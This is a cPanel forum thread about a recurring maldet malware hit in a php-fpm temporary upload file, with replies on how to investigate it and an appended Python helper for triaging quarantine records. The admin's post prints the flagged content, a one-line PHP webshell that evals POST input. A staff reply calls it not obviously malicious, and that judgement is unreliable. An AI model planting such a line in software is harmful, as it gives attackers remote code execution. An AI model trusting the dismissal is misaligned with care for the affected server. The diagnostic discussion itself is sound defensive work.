Gojko (Well-Known Member, joined Nov 24, 2014, Macedonia; cPanel Access Level: Root Administrator)
I get this from maldet about once a month. Does anyone know what this is? If it is dangerous, how do I prevent it?
I have the latest cPanel (no 3rd party software) and the latest kernel, so the system is updated.

FILE HIT LIST:
{HEX}php.malware.fopo.538 : /tmp/systemd-private-11cbc4cb89194d10b68f70c00007011e-ea-php56-php-fpm.service-St7D8B/tmp/phpYRhpBm => /usr/local/maldetect/quarantine/phpYRhpBm.706132374
 

24x7server (Well-Known Member, joined Apr 17, 2013, India; cPanel Access Level: Root Administrator)
Hi,

Check which user uploaded this file. The user's data may be infected, causing this to occur.

# ls -l /tmp/systemd-private-11cbc4cb89194d10b68f70c00007011e-ea-php56-php-fpm.service-St7D8B/tmp/phpYRhpBm
OR
check the maldet session logs to see when it was quarantined and what process recalled it.
 

cPanelMichael (Administrator, Staff member, joined Apr 11, 2011)
Hello,

Let us know if the previous post helps. Note that Maldet is a third-party application, so you may want to reach out to a system administrator for additional assistance if you don't receive additional user-feedback on this thread:

System Administration Services | cPanel Forums

Thank you.
 

Gojko
Hello, thank you for the answer. The session log shows only what is in the report; I checked it with "maldet -l".
That folder doesn't exist because I have quarantine enabled, so the message is: No such file or directory.
Any other suggestions?
 

cPanelMichael
That folder doesn't exist because I have quarantine enabled
Hello,

Does the file exist in the /usr/local/maldetect/quarantine directory? If so, you could view the file to verify its contents and see if it's legitimate. Note, if it's detecting "/usr/lib/systemd/system/ea-php56-php-fpm.service", here's how the contents of that file should look:

Code:
# cat /usr/lib/systemd/system/ea-php56-php-fpm.service
[Unit]
Description=The PHP FastCGI Process Manager
After=syslog.target network.target network-online.target

[Service]
Type=notify
PIDFile=/opt/cpanel/ea-php56/root/usr/var/run/php-fpm/php-fpm.pid
EnvironmentFile=/opt/cpanel/ea-php56/root/etc/sysconfig/php-fpm
ExecStart=/opt/cpanel/ea-php56/root/usr/sbin/php-fpm --nodaemonize
ExecReload=/bin/kill -USR2 $MAINPID
PrivateTmp=true

[Install]
WantedBy=multi-user.target
Thank you.
 

Gojko
Actually no, in quarantine there are no files/folders like that. I will check directly in quarantine next time (because it happens a couple of times a month) and update this thread.
 

Gojko
Hello. The content of one of them is:
Code:
8D9AAC4D8E44392996B8CDF782<?php  @eval($_POST['xbcmd']); die();?>
The second:

Code:
# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
CPANELACCOUNT:CPANELACCOUNT:600:71:0e95b1762b4f353bec9209d75350:1523196703:1523196508:1523196508:/tmp/systemd-private-21c4a2923244dbbd6c0543722c8f4-ea-php56-php-fpm.service-SBugLp/tmp/phpZRL1RW
maldet:
Code:
maldet(20913): {scan} scan completed on /home/CPANELACCOUNT: files 3076, malware hits 0, cleaned hits 0, time 44s

Code:
cat /usr/lib/systemd/system/ea-php56-php-fpm.service
[Unit]
Description=The PHP FastCGI Process Manager
After=syslog.target network.target network-online.target securetmp.service

[Service]
Type=notify
PIDFile=/opt/cpanel/ea-php56/root/usr/var/run/php-fpm/php-fpm.pid
EnvironmentFile=/opt/cpanel/ea-php56/root/etc/sysconfig/php-fpm
ExecStart=/opt/cpanel/ea-php56/root/usr/sbin/php-fpm --nodaemonize
ExecReload=/bin/kill -USR2 $MAINPID
PrivateTmp=true
LimitNOFILE=infinity

[Install]
WantedBy=multi-user.target
 

cPanelMichael
Hello,

The contents of the /usr/lib/systemd/system/ea-php56-php-fpm.service file that you provided match what I see on a test system. However, I believe you are referring to the contents of the PHP file in the /tmp directory. I don't see any obvious signs of malicious intent based on the information you provided, but you may want to reach out to a system administrator for additional assistance if you want a more in-depth investigation:

System Administration Services | cPanel Forums

Thank you.
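An added example, not code from this thread and not maldet's own: a small triage helper that parses the quarantine metadata record Gojko posted above (the owner:group:mode:size(b):md5:atime:mtime:ctime:file(path) line) and flags hits whose path is a PHP temporary upload file (php + six random characters) inside a php-fpm PrivateTmp directory. Such a hit means a site under that cPanel account accepted an upload whose body contained the flagged content (here a one-line eval of POST input), and the mtime gives the window to check that account's access log. The function names and the sample records are my own; the records are constructed and the md5 values are placeholders.

```python
"""maldet quarantine-record triage (added example; not from the thread or from maldet).
Record format, as shown in the thread:
  # owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
SAMPLE_INFO is constructed for this example; the md5 values are placeholders."""
import re
from collections import namedtuple
from datetime import datetime, timezone

# PHP temporary upload file (php + 6 random chars) inside a php-fpm PrivateTmp
# namespace: the path pattern from the thread.
PRIVATE_TMP_UPLOAD = re.compile(
    r"^/tmp/systemd-private-[0-9a-f]+-(?P<service>[^/]+\.service)-[^/]+"
    r"/tmp/php[A-Za-z0-9]{6}$")

SAMPLE_INFO = """\
# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
CPANELACCOUNT:CPANELACCOUNT:600:71:0123456789abcdef0123456789abcdef:1523196703:1523196508:1523196508:/tmp/systemd-private-11cbc4cb89194d10b68f70c00007011e-ea-php56-php-fpm.service-St7D8B/tmp/phpYRhpBm
otheruser:otheruser:644:1024:fedcba9876543210fedcba9876543210:1523196000:1523195000:1523195000:/home/otheruser/public_html/wp-content/uploads/x.php
"""

Record = namedtuple("Record", "owner group mode size md5 atime mtime ctime path")

def parse_record(line):
    """Parse one record; the path is last and may contain ':', so split at most 8 times."""
    fields = line.strip().split(":", 8)
    if len(fields) != 9:
        raise ValueError("expected 9 fields, got %d" % len(fields))
    owner, group, mode, size, md5, atime, mtime, ctime, path = fields
    ts = lambda s: datetime.fromtimestamp(int(s), tz=timezone.utc)
    return Record(owner, group, mode, int(size), md5, ts(atime), ts(mtime), ts(ctime), path)

def upload_service(path):
    """php-fpm service whose PrivateTmp held the file, or None if not an upload temp file."""
    m = PRIVATE_TMP_UPLOAD.match(path)
    return m.group("service") if m else None

def triage(info_text):
    """Return (owner, service, mtime) for hits that were in-flight PHP uploads.
    Such a hit does not show the script ever ran: PHP removes the temp file when the
    request ends unless the handling script moved it under the document root, which
    is where a follow-up scan of that account belongs."""
    hits = []
    for line in info_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue  # skip the header comment and blank lines
        rec = parse_record(line)
        service = upload_service(rec.path)
        if service:
            hits.append((rec.owner, service, rec.mtime))
    return hits
```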